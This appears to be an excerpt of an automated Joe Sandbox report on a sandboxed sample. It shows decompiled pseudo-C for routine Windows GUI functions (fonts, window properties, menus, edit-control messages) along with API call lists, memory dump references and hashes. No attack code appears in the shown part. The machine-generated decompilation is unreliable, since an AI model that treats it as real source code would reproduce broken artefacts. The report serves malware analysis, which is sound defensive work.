				if( *0x49ebb8 != 0) {
					_t54 =  *0x49ebb8; // 0x0
					_v5 =  *((intOrPtr*)(_t54 + 0x88));
				}
				_push(_t74);
				_push(0x4588e9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				if( *0x49ebb8 != 0) {
					_t52 =  *0x49ebb8; // 0x0
					E0045AD24(_t52, 0);
				}
				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
					_t23 = GetStockObject(0xd);
					_t7 = _t57 + 0x84; // 0x38004010
					E00424FCC( *_t7, _t23, _t72);
				} else {
					_t49 = CreateFontIndirectA( &_v65); // executed
					_t6 = _t57 + 0x84; // 0x38004010
					E00424FCC( *_t6, _t49, _t72);
				}
				_v405 = 0x154;
				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed
				if(_t27 == 0) {
					_t14 = _t57 + 0x80; // 0x94000000
					E004250B0( *_t14, 8);
					_t30 = GetStockObject(0xd);
					_t15 = _t57 + 0x88; // 0x90000000
					E00424FCC( *_t15, _t30, _t72);
				} else {
					_t41 = CreateFontIndirectA( &_v185);
					_t11 = _t57 + 0x80; // 0x94000000
					E00424FCC( *_t11, _t41, _t72);
					_t45 = CreateFontIndirectA( &_v245);
					_t13 = _t57 + 0x88; // 0x90000000
					E00424FCC( *_t13, _t45, _t72);
				}
				_t16 = _t57 + 0x80; // 0x94000000
				E00424E10( *_t16, 0xff000017);
				_t17 = _t57 + 0x88; // 0x90000000
				E00424E10( *_t17, 0xff000007);
				 *[fs:eax] = 0xff000007;
				_push(0x4588f0);
				if( *0x49ebb8 != 0) {
					_t38 =  *0x49ebb8; // 0x0
					return E0045AD24(_t38, _v5);
				}
				return 0;
			}






















                                                                                                                                                                                                                            0x004587a4
                                                                                                                                                                                                                            0x004587a5
                                                                                                                                                                                                                            0x004587a7
                                                                                                                                                                                                                            0x004587ae
                                                                                                                                                                                                                            0x004587b0
                                                                                                                                                                                                                            0x004587bb
                                                                                                                                                                                                                            0x004587bd
                                                                                                                                                                                                                            0x004587c8
                                                                                                                                                                                                                            0x004587c8
                                                                                                                                                                                                                            0x004587cd
                                                                                                                                                                                                                            0x004587ce
                                                                                                                                                                                                                            0x004587d3
                                                                                                                                                                                                                            0x004587d6
                                                                                                                                                                                                                            0x004587e0
                                                                                                                                                                                                                            0x004587e4
                                                                                                                                                                                                                            0x004587e9
                                                                                                                                                                                                                            0x004587e9
                                                                                                                                                                                                                            0x004587ff
                                                                                                                                                                                                                            0x0045881b
                                                                                                                                                                                                                            0x00458822
                                                                                                                                                                                                                            0x00458828
                                                                                                                                                                                                                            0x00458801
                                                                                                                                                                                                                            0x00458805
                                                                                                                                                                                                                            0x0045880c
                                                                                                                                                                                                                            0x00458812
                                                                                                                                                                                                                            0x00458812
                                                                                                                                                                                                                            0x0045882d
                                                                                                                                                                                                                            0x00458844
                                                                                                                                                                                                                            0x0045884b
                                                                                                                                                                                                                            0x00458881
                                                                                                                                                                                                                            0x0045888c
                                                                                                                                                                                                                            0x00458893
                                                                                                                                                                                                                            0x0045889a
                                                                                                                                                                                                                            0x004588a0
                                                                                                                                                                                                                            0x0045884d
                                                                                                                                                                                                                            0x00458854
                                                                                                                                                                                                                            0x0045885b
                                                                                                                                                                                                                            0x00458861
                                                                                                                                                                                                                            0x0045886d
                                                                                                                                                                                                                            0x00458874
                                                                                                                                                                                                                            0x0045887a
                                                                                                                                                                                                                            0x0045887a
                                                                                                                                                                                                                            0x004588a5
                                                                                                                                                                                                                            0x004588b0
                                                                                                                                                                                                                            0x004588b5
                                                                                                                                                                                                                            0x004588c0
                                                                                                                                                                                                                            0x004588ca
                                                                                                                                                                                                                            0x004588cd
                                                                                                                                                                                                                            0x004588d9
                                                                                                                                                                                                                            0x004588de
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004588e3
                                                                                                                                                                                                                            0x004588e8

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 004587F8
                                                                                                                                                                                                                            • CreateFontIndirectA.GDI32(?), ref: 00458805
                                                                                                                                                                                                                            • GetStockObject.GDI32(0000000D), ref: 0045881B
                                                                                                                                                                                                                              • Part of subcall function 004250B0: MulDiv.KERNEL32(00000000,?,00000048), ref: 004250BD
                                                                                                                                                                                                                            • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00458844
                                                                                                                                                                                                                            • CreateFontIndirectA.GDI32(?), ref: 00458854
                                                                                                                                                                                                                            • CreateFontIndirectA.GDI32(?), ref: 0045886D
                                                                                                                                                                                                                            • GetStockObject.GDI32(0000000D), ref: 00458893
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2891467149-0
                                                                                                                                                                                                                            • Opcode ID: 1d318198154b46cf8f2b40026440cf65ed92ca40f81abb2fb166fbe13c1f9689
                                                                                                                                                                                                                            • Instruction ID: c8c9ae32e1ca622756d665ee7f261621c5687007f21876862268219cdbc985ab
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1d318198154b46cf8f2b40026440cf65ed92ca40f81abb2fb166fbe13c1f9689
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E318330B042449FE750FBA9DC42B9973A4EB44305F9440BABD08EB2D7DE78A949C729
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00437D70 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00437D70(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* _t20;
				void* _t21;
				void* _t27;
				void* _t31;
				void* _t35;
				intOrPtr* _t43;

				_t43 =  &_v8;
				_t20 =  *0x49bc20; // 0x0
				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
				_t21 =  *0x49bc20; // 0x0
				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
					SetWindowLongA(_a4, 0xfffffff4, _a4);
				}
				_t27 =  *0x49bc20; // 0x0
				SetPropA(_a4,  *0x49eb26 & 0x0000ffff, _t27);
				_t31 =  *0x49bc20; // 0x0
				SetPropA(_a4,  *0x49eb24 & 0x0000ffff, _t31);
				_t35 =  *0x49bc20; // 0x0
				 *0x49bc20 = 0; // executed
				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
				return  *_t43;
			}










                                                                                                                                                                                                                            0x00437d75
                                                                                                                                                                                                                            0x00437d78
                                                                                                                                                                                                                            0x00437d80
                                                                                                                                                                                                                            0x00437d86
                                                                                                                                                                                                                            0x00437d98
                                                                                                                                                                                                                            0x00437dad
                                                                                                                                                                                                                            0x00437dc8
                                                                                                                                                                                                                            0x00437dc8
                                                                                                                                                                                                                            0x00437dcd
                                                                                                                                                                                                                            0x00437ddf
                                                                                                                                                                                                                            0x00437de4
                                                                                                                                                                                                                            0x00437df6
                                                                                                                                                                                                                            0x00437e07
                                                                                                                                                                                                                            0x00437e0c
                                                                                                                                                                                                                            0x00437e1c
                                                                                                                                                                                                                            0x00437e24

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetWindowLongA.USER32 ref: 00437D98
                                                                                                                                                                                                                            • GetWindowLongA.USER32 ref: 00437DA3
                                                                                                                                                                                                                            • GetWindowLongA.USER32 ref: 00437DB5
                                                                                                                                                                                                                            • SetWindowLongA.USER32 ref: 00437DC8
                                                                                                                                                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 00437DDF
                                                                                                                                                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 00437DF6
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: LongWindow$Prop
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3887896539-0
                                                                                                                                                                                                                            • Opcode ID: 51d6e6583fdfce383e099e89a982cca909cf1dddc6894a580fa6964d4a767a4a
                                                                                                                                                                                                                            • Instruction ID: b5f16ed505960de4fc23b1fb6768328cc78d5017c86fd9e1eb6bf423726d3339
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51d6e6583fdfce383e099e89a982cca909cf1dddc6894a580fa6964d4a767a4a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0111CCB5504208BFDB10DF9DDD84EAA37E8EB1C354F10462AF914DB2A1DB34E9409BA9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00457FC8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                                                                            			E00457FC8(char __edx, void* __edi) {
				char _v5;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				intOrPtr _t25;
				intOrPtr* _t28;
				intOrPtr* _t29;
				intOrPtr _t42;
				intOrPtr* _t45;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t62;
				void* _t63;
				char _t64;
				void* _t74;
				intOrPtr _t75;
				void* _t76;
				void* _t77;

				_t74 = __edi;
				_t64 = __edx;
				if(__edx != 0) {
					_t77 = _t77 + 0xfffffff0;
					_t25 = E00403F10(_t25, _t76);
				}
				_v5 = _t64;
				_t62 = _t25;
				E00421B3C(_t63, 0);
				_t28 =  *0x49d878; // 0x49b510
				 *((intOrPtr*)(_t28 + 4)) = _t62;
				 *_t28 = 0x45836c;
				_t29 =  *0x49d888; // 0x49b518
				 *((intOrPtr*)(_t29 + 4)) = _t62;
				 *_t29 = 0x458378;
				E00458384(_t62);
				 *((intOrPtr*)(_t62 + 0x3c)) = GetKeyboardLayout(0);
				 *((intOrPtr*)(_t62 + 0x4c)) = E00403BBC(1);
				 *((intOrPtr*)(_t62 + 0x50)) = E00403BBC(1);
				 *((intOrPtr*)(_t62 + 0x54)) = E00403BBC(1);
				 *((intOrPtr*)(_t62 + 0x58)) = E00403BBC(1);
				_t42 = E00403BBC(1);
				 *((intOrPtr*)(_t62 + 0x7c)) = _t42;
				L00407638();
				_t75 = _t42;
				L00407380();
				 *((intOrPtr*)(_t62 + 0x40)) = _t42;
				L00407888();
				_t11 = _t62 + 0x58; // 0x45122c6e
				_t45 =  *0x49dae4; // 0x49e91c
				 *((intOrPtr*)( *_t45))(0, 0, E004547A0,  *_t11, 0, _t75, _t75, 0x5a, 0);
				 *((intOrPtr*)(_t62 + 0x84)) = E00424C3C(1);
				 *((intOrPtr*)(_t62 + 0x88)) = E00424C3C(1);
				 *((intOrPtr*)(_t62 + 0x80)) = E00424C3C(1);
				E004587A4(_t62, _t62, _t63, _t74);
				_t15 = _t62 + 0x84; // 0x38004010
				_t56 =  *_t15;
				 *((intOrPtr*)(_t56 + 0xc)) = _t62;
				 *((intOrPtr*)(_t56 + 8)) = 0x458680;
				_t18 = _t62 + 0x88; // 0x90000000
				_t57 =  *_t18;
				 *((intOrPtr*)(_t57 + 0xc)) = _t62;
				 *((intOrPtr*)(_t57 + 8)) = 0x458680;
				_t21 = _t62 + 0x80; // 0x94000000
				_t58 =  *_t21;
				 *((intOrPtr*)(_t58 + 0xc)) = _t62;
				 *((intOrPtr*)(_t58 + 8)) = 0x458680;
				_t59 = _t62;
				if(_v5 != 0) {
					E00403F68(_t59);
					_pop( *[fs:0x0]);
				}
				return _t62;
			}























                                                                                                                                                                                                                            0x00457fc8
                                                                                                                                                                                                                            0x00457fc8
                                                                                                                                                                                                                            0x00457fd0
                                                                                                                                                                                                                            0x00457fd2
                                                                                                                                                                                                                            0x00457fd5
                                                                                                                                                                                                                            0x00457fd5
                                                                                                                                                                                                                            0x00457fda
                                                                                                                                                                                                                            0x00457fdd
                                                                                                                                                                                                                            0x00457fe3
                                                                                                                                                                                                                            0x00457fe8
                                                                                                                                                                                                                            0x00457fed
                                                                                                                                                                                                                            0x00457ff0
                                                                                                                                                                                                                            0x00457ff6
                                                                                                                                                                                                                            0x00457ffb
                                                                                                                                                                                                                            0x00457ffe
                                                                                                                                                                                                                            0x00458006
                                                                                                                                                                                                                            0x00458012
                                                                                                                                                                                                                            0x00458021
                                                                                                                                                                                                                            0x00458030
                                                                                                                                                                                                                            0x0045803f
                                                                                                                                                                                                                            0x0045804e
                                                                                                                                                                                                                            0x00458058
                                                                                                                                                                                                                            0x0045805d
                                                                                                                                                                                                                            0x00458062
                                                                                                                                                                                                                            0x00458067
                                                                                                                                                                                                                            0x0045806c
                                                                                                                                                                                                                            0x00458071
                                                                                                                                                                                                                            0x00458077
                                                                                                                                                                                                                            0x0045807c
                                                                                                                                                                                                                            0x0045808a
                                                                                                                                                                                                                            0x00458091
                                                                                                                                                                                                                            0x0045809f
                                                                                                                                                                                                                            0x004580b1
                                                                                                                                                                                                                            0x004580c3
                                                                                                                                                                                                                            0x004580cb
                                                                                                                                                                                                                            0x004580d0
                                                                                                                                                                                                                            0x004580d0
                                                                                                                                                                                                                            0x004580d6
                                                                                                                                                                                                                            0x004580d9
                                                                                                                                                                                                                            0x004580e0
                                                                                                                                                                                                                            0x004580e0
                                                                                                                                                                                                                            0x004580e6
                                                                                                                                                                                                                            0x004580e9
                                                                                                                                                                                                                            0x004580f0
                                                                                                                                                                                                                            0x004580f0
                                                                                                                                                                                                                            0x004580f6
                                                                                                                                                                                                                            0x004580f9
                                                                                                                                                                                                                            0x00458100
                                                                                                                                                                                                                            0x00458106
                                                                                                                                                                                                                            0x00458108
                                                                                                                                                                                                                            0x0045810d
                                                                                                                                                                                                                            0x00458114
                                                                                                                                                                                                                            0x0045811d

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetKeyboardLayout.USER32 ref: 0045800D
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 00458062
                                                                                                                                                                                                                            • 73C9AD70.GDI32(00000000,0000005A,00000000,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0045806C
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?), ref: 00458077
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: B380KeyboardLayout
                                                                                                                                                                                                                            • String ID: 5B
                                                                                                                                                                                                                            • API String ID: 648844651-3738334870
                                                                                                                                                                                                                            • Opcode ID: 5487fb6c7b3bcedcedcd71127f0cf86c88c6ea033be2a968eb4a0643db19cfd2
                                                                                                                                                                                                                            • Instruction ID: 7c78f0e896318b154a236a51f14d482704da40fbffa7cbfd833c934430294294
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5487fb6c7b3bcedcedcd71127f0cf86c88c6ea033be2a968eb4a0643db19cfd2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2331EA706052049FD740EF2AD8C1B497BE5FB05319F4480BEEC08DF367DA7AA9498B59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004348A8 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                                                                                            			E004348A8(void* __eax, void* __ebx, intOrPtr __ecx, int __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				long _t27;
				long _t34;
				int _t42;
				int _t43;
				intOrPtr _t50;
				int _t54;
				void* _t57;
				void* _t60;

				_v12 = 0;
				_v8 = __ecx;
				_t54 = __edx;
				_t57 = __eax;
				_push(_t60);
				_push(0x434993);
				_push( *[fs:eax]);
				 *[fs:eax] = _t60 + 0xfffffff8;
				if(__edx >= 0) {
					_t42 = SendMessageA(E00441704( *((intOrPtr*)(__eax + 0x10))), 0xbb, __edx, 0);
					if(_t42 < 0) {
						_t43 = SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xbb, _t54 - 1, 0);
						if(_t43 >= 0) {
							_t27 = SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xc1, _t43, 0);
							if(_t27 != 0) {
								_t42 = _t43 + _t27;
								E00404CCC( &_v12, _v8, 0x4349ac);
								goto L6;
							}
						}
					} else {
						E00404CCC( &_v12, 0x4349ac, _v8);
						L6:
						SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xb1, _t42, _t42);
						_t34 = E00404E80(_v12);
						SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xc2, 0, _t34); // executed
					}
				}
				_pop(_t50);
				 *[fs:eax] = _t50;
				_push(0x43499a);
				return E004049C0( &_v12);
			}













                                                                                                                                                                                                                            0x004348b3
                                                                                                                                                                                                                            0x004348b6
                                                                                                                                                                                                                            0x004348b9
                                                                                                                                                                                                                            0x004348bb
                                                                                                                                                                                                                            0x004348bf
                                                                                                                                                                                                                            0x004348c0
                                                                                                                                                                                                                            0x004348c5
                                                                                                                                                                                                                            0x004348c8
                                                                                                                                                                                                                            0x004348cd
                                                                                                                                                                                                                            0x004348e9
                                                                                                                                                                                                                            0x004348ed
                                                                                                                                                                                                                            0x00434918
                                                                                                                                                                                                                            0x0043491c
                                                                                                                                                                                                                            0x0043492f
                                                                                                                                                                                                                            0x00434936
                                                                                                                                                                                                                            0x00434938
                                                                                                                                                                                                                            0x00434945
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00434945
                                                                                                                                                                                                                            0x00434936
                                                                                                                                                                                                                            0x004348ef
                                                                                                                                                                                                                            0x004348fa
                                                                                                                                                                                                                            0x0043494a
                                                                                                                                                                                                                            0x0043495a
                                                                                                                                                                                                                            0x00434962
                                                                                                                                                                                                                            0x00434978
                                                                                                                                                                                                                            0x00434978
                                                                                                                                                                                                                            0x004348ed
                                                                                                                                                                                                                            0x0043497f
                                                                                                                                                                                                                            0x00434982
                                                                                                                                                                                                                            0x00434985
                                                                                                                                                                                                                            0x00434992

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                            • Opcode ID: 355f4deacd5125564ffb9ba19f0dd5d69ef2a983a7f0a38bbff004384fc211bf
                                                                                                                                                                                                                            • Instruction ID: 60fe2270a456efbc5898118594648b470be5076c4c12df513f5ffd0388d1f25b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 355f4deacd5125564ffb9ba19f0dd5d69ef2a983a7f0a38bbff004384fc211bf
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5219BB1644704ABE710ABB6CC82F9B76ACEF84718F10453EB501A73D2DB78BD00C559
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00454A44 Relevance: 6.1, APIs: 4, Instructions: 148windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                                                                            			E00454A44(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t41;
				void* _t54;
				void* _t61;
				struct HMENU__* _t64;
				struct HMENU__* _t70;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t81;
				intOrPtr _t83;
				intOrPtr _t87;
				void* _t92;
				intOrPtr _t98;
				void* _t111;
				intOrPtr _t113;
				void* _t116;

				_t109 = __edi;
				_push(__edi);
				_v20 = 0;
				_t113 = __edx;
				_t92 = __eax;
				_push(_t116);
				_push(0x454c0a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t116 + 0xfffffff0;
				if(__edx == 0) {
					L7:
					_t39 =  *((intOrPtr*)(_t92 + 0x248));
					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
						E0044E3BC(_t39, 0, _t109, 0);
					}
					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t113 != 0 && ( *(_t113 + 0x1c) & 0x00000008) != 0) {
						_t113 = 0;
					}
					 *((intOrPtr*)(_t92 + 0x248)) = _t113;
					if(_t113 != 0) {
						E00421C0C(_t113, _t92);
					}
					if(_t113 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
						_t41 = E00441A08(_t92);
						__eflags = _t41;
						if(_t41 != 0) {
							SetMenu(E00441704(_t92), 0); // executed
						}
						goto L30;
					} else {
						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
								if( *((char*)(_t92 + 0x22f)) != 1) {
									_t54 = E00441A08(_t92);
									__eflags = _t54;
									if(_t54 != 0) {
										SetMenu(E00441704(_t92), 0);
									}
								}
								goto L30;
							}
							goto L21;
						} else {
							L21:
							if(E00441A08(_t92) != 0) {
								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
								_t110 = _t61;
								_t64 = GetMenu(E00441704(_t92));
								_t138 = _t61 - _t64;
								if(_t61 != _t64) {
									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
									SetMenu(E00441704(_t92), _t70);
								}
								E0044E3BC(_t113, E00441704(_t92), _t110, _t138);
							}
							L30:
							if( *((char*)(_t92 + 0x22e)) != 0) {
								E00455B08(_t92, 1);
							}
							E0045497C(_t92);
							_pop(_t98);
							 *[fs:eax] = _t98;
							_push(0x454c11);
							return E004049C0( &_v20);
						}
					}
				}
				_t77 =  *0x49ebbc; // 0x0
				_t79 = E00458274(_t77) - 1;
				if(_t79 >= 0) {
					_v8 = _t79 + 1;
					_t111 = 0;
					do {
						_t81 =  *0x49ebbc; // 0x0
						if(_t113 ==  *((intOrPtr*)(E00458260(_t81, _t111) + 0x248))) {
							_t83 =  *0x49ebbc; // 0x0
							if(_t92 != E00458260(_t83, _t111)) {
								_v16 =  *((intOrPtr*)(_t113 + 8));
								_v12 = 0xb;
								_t87 =  *0x49d8b4; // 0x423118
								E00406A70(_t87,  &_v20);
								E0040D180(_t92, _v20, 1, _t111, _t113, 0,  &_v16);
								E00404378();
							}
						}
						_t111 = _t111 + 1;
						_t10 =  &_v8;
						 *_t10 = _v8 - 1;
					} while ( *_t10 != 0);
				}
			}






















                                                                                                                                                                                                                            0x00454a44
                                                                                                                                                                                                                            0x00454a4c
                                                                                                                                                                                                                            0x00454a4f
                                                                                                                                                                                                                            0x00454a52
                                                                                                                                                                                                                            0x00454a54
                                                                                                                                                                                                                            0x00454a58
                                                                                                                                                                                                                            0x00454a59
                                                                                                                                                                                                                            0x00454a5e
                                                                                                                                                                                                                            0x00454a61
                                                                                                                                                                                                                            0x00454a66
                                                                                                                                                                                                                            0x00454ad8
                                                                                                                                                                                                                            0x00454ad8
                                                                                                                                                                                                                            0x00454ae0
                                                                                                                                                                                                                            0x00454ae4
                                                                                                                                                                                                                            0x00454ae4
                                                                                                                                                                                                                            0x00454aed
                                                                                                                                                                                                                            0x00454af9
                                                                                                                                                                                                                            0x00454af9
                                                                                                                                                                                                                            0x00454afb
                                                                                                                                                                                                                            0x00454b03
                                                                                                                                                                                                                            0x00454b09
                                                                                                                                                                                                                            0x00454b09
                                                                                                                                                                                                                            0x00454b10
                                                                                                                                                                                                                            0x00454bc3
                                                                                                                                                                                                                            0x00454bc8
                                                                                                                                                                                                                            0x00454bca
                                                                                                                                                                                                                            0x00454bd6
                                                                                                                                                                                                                            0x00454bd6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00454b29
                                                                                                                                                                                                                            0x00454b33
                                                                                                                                                                                                                            0x00454b42
                                                                                                                                                                                                                            0x00454b9c
                                                                                                                                                                                                                            0x00454ba3
                                                                                                                                                                                                                            0x00454ba7
                                                                                                                                                                                                                            0x00454bac
                                                                                                                                                                                                                            0x00454bae
                                                                                                                                                                                                                            0x00454bba
                                                                                                                                                                                                                            0x00454bba
                                                                                                                                                                                                                            0x00454bae
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00454ba3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00454b44
                                                                                                                                                                                                                            0x00454b44
                                                                                                                                                                                                                            0x00454b4d
                                                                                                                                                                                                                            0x00454b5b
                                                                                                                                                                                                                            0x00454b5e
                                                                                                                                                                                                                            0x00454b68
                                                                                                                                                                                                                            0x00454b6d
                                                                                                                                                                                                                            0x00454b6f
                                                                                                                                                                                                                            0x00454b79
                                                                                                                                                                                                                            0x00454b85
                                                                                                                                                                                                                            0x00454b85
                                                                                                                                                                                                                            0x00454b95
                                                                                                                                                                                                                            0x00454b95
                                                                                                                                                                                                                            0x00454bdb
                                                                                                                                                                                                                            0x00454be2
                                                                                                                                                                                                                            0x00454be8
                                                                                                                                                                                                                            0x00454be8
                                                                                                                                                                                                                            0x00454bef
                                                                                                                                                                                                                            0x00454bf6
                                                                                                                                                                                                                            0x00454bf9
                                                                                                                                                                                                                            0x00454bfc
                                                                                                                                                                                                                            0x00454c09
                                                                                                                                                                                                                            0x00454c09
                                                                                                                                                                                                                            0x00454b33
                                                                                                                                                                                                                            0x00454b10
                                                                                                                                                                                                                            0x00454a68
                                                                                                                                                                                                                            0x00454a72
                                                                                                                                                                                                                            0x00454a75
                                                                                                                                                                                                                            0x00454a78
                                                                                                                                                                                                                            0x00454a7b
                                                                                                                                                                                                                            0x00454a7d
                                                                                                                                                                                                                            0x00454a7f
                                                                                                                                                                                                                            0x00454a8f
                                                                                                                                                                                                                            0x00454a93
                                                                                                                                                                                                                            0x00454a9f
                                                                                                                                                                                                                            0x00454aa4
                                                                                                                                                                                                                            0x00454aa7
                                                                                                                                                                                                                            0x00454ab4
                                                                                                                                                                                                                            0x00454ab9
